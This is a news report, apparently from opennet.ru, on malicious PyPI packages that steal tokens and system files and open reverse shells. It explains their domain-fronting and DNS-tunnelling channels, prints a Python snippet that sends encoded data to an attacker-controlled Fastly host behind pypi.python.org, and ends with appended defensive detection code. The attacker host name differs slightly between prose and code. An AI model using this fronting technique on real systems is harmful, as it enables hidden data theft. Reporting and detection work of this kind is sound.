Malicious libraries detected in the PyPI catalog that use the PyPI CDN to hide the communication channel

The PyPI (Python Package Index) catalog was found to contain 11 packages with malicious code. Before the problem was identified, the packages had been downloaded about 38 thousand times in total. The detected packages are notable for the intricate ways they hide the communication channels to the attackers' servers.

  • importantpackage (6305 downloads), important-package (12897) - established a connection to an external server under the guise of connecting to pypi.python.org in order to provide shell access to the system (reverse shell), and used the trevorc2 program to hide the communication channel.
  • pptest (10001), ipboards (946) - used DNS as a communication channel to transfer information about the system (in the first packet the hostname, working directory, internal and external IP; in the second the username and hostname).
  • owlmoon (3285), DiscordSafety (557), yiffparty (1859) - looked for a Discord service token on the system and sent it to an external host.
  • trrfab (287) - sends an identifier, the hostname and the contents of /etc/passwd, /etc/hosts and /home to an external host.
  • 10Cent10 (490) - established a reverse shell connection to an external host.
  • yandex-yt (4183) - displayed a message saying the system had been compromised and redirected to a page with additional information about further actions, served via nda.ya.ru (api.ya.cc).

Of particular note is the method of reaching external hosts used in the importantpackage and important-package packages, which abused the Fastly content delivery network that serves the PyPI catalog to hide their activity. Requests were actually sent to the pypi.python.org server (including python.org as the SNI name in the HTTPS request), but the "Host" HTTP header named a server controlled by the attackers (sec.forward.io.global.prod.fastly.net). The content delivery network then forwarded the request to the attackers' server, while on the wire the data travelled inside a TLS connection whose parameters matched pypi.python.org.

The PyPI infrastructure is served through the Fastly content delivery network, which uses a transparent Varnish proxy to cache typical requests and terminates TLS (handles the TLS certificates) at the CDN level rather than on the end servers, so that HTTPS requests are forwarded through the proxy. Regardless of the target host, requests arrive at the proxy, which determines the desired host from the “Host” HTTP header; the hosts' domain names resolve to the shared IP addresses of the CDN load balancers that are common to all Fastly clients.

The attackers' server is also registered with the Fastly CDN, which offers free plans to everyone and even allows anonymous registration. Notably, the “reverse shell” uses the same scheme to send requests to the victim, only initiated by the attackers' host. From the outside, interaction with the attackers' server looks like a legitimate session with the PyPI catalog, encrypted using the PyPI TLS certificate. A similar technique, known as "domain fronting", was previously actively used to hide the host name when bypassing blocking: it relies on the ability, provided by some CDNs, to make an HTTPS request with a decoy host specified in SNI while the name of the actually requested host is transmitted in the Host HTTP header inside the TLS session.


To hide malicious activity, the TrevorC2 package was additionally used, which made interaction with the server resemble normal web browsing; for example, malicious requests were sent under the guise of downloading an image from “https://pypi.python.org/images?guid=”, with the transmitted information encoded in the guid parameter:

    from urllib import request

    # b64_payload holds the encoded data carried in the guid parameter (built elsewhere in the package)
    url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
    # The TLS connection and SNI go to pypi.python.org; the Host header selects the attackers' Fastly-hosted server
    r = request.Request(url, headers={'Host': "psec.forward.io.global.prod.fastly.net"})

The pptest and ipboards packages used a different approach to hiding network activity, based on encoding the payload in queries to a DNS server. The malware transmits information by issuing DNS requests of the form "nu4timjagq4fimbuhe.example.com", in which the data sent to the command and control server is encoded in the subdomain label using base64. The attacker receives these messages by controlling the DNS server for the example.com domain.
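As an added example (not code from the article or from the packages it describes), the two network signs described above, an HTTP Host header that does not match the TLS SNI and DNS queries carrying long encoded labels, can be checked over proxy and DNS logs. The log records below are constructed from the names quoted in the article; the field layout and the thresholds are assumptions.

```python
import math
from collections import Counter

# Constructed sample records of the kind a TLS-inspecting proxy or Zeek would emit:
# (tls_sni, http_host). The second record reproduces the mismatch pattern from the article.
PROXY_LOG = [
    ("pypi.python.org", "pypi.python.org"),
    ("pypi.python.org", "psec.forward.io.global.prod.fastly.net"),
    ("files.pythonhosted.org", "files.pythonhosted.org"),
]

# Constructed DNS query log; the first name mimics the encoded-subdomain pattern.
DNS_LOG = [
    "nu4timjagq4fimbuhe.example.com",
    "pypi.org",
    "www.example.com",
]


def fronting_mismatches(records):
    """Return (sni, host) pairs whose HTTP Host header is not covered by the TLS SNI.
    A Host equal to the SNI, or a subdomain of it, is treated as consistent."""
    hits = []
    for sni, host in records:
        sni, host = sni.lower().rstrip("."), host.lower().rstrip(".")
        if host != sni and not host.endswith("." + sni):
            hits.append((sni, host))
    return hits


def shannon_entropy(label):
    """Bits of entropy per character of a DNS label (0.0 for a single repeated character)."""
    counts = Counter(label)
    return -sum(c / len(label) * math.log2(c / len(label)) for c in counts.values())


def suspicious_dns_queries(queries, min_len=16, min_entropy=3.0):
    """Flag names whose leftmost label is long and high-entropy, the hallmark of
    encoded data tunnelled in a subdomain (thresholds are assumed starting points)."""
    hits = []
    for q in queries:
        label = q.split(".")[0]
        if len(label) >= min_len and shannon_entropy(label) >= min_entropy:
            hits.append(q)
    return hits
```

A real deployment should also whitelist known-good mismatches (CDN customers legitimately share front-end addresses) and tune the DNS thresholds against the organisation's own query baseline.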

Source: opennet.ru
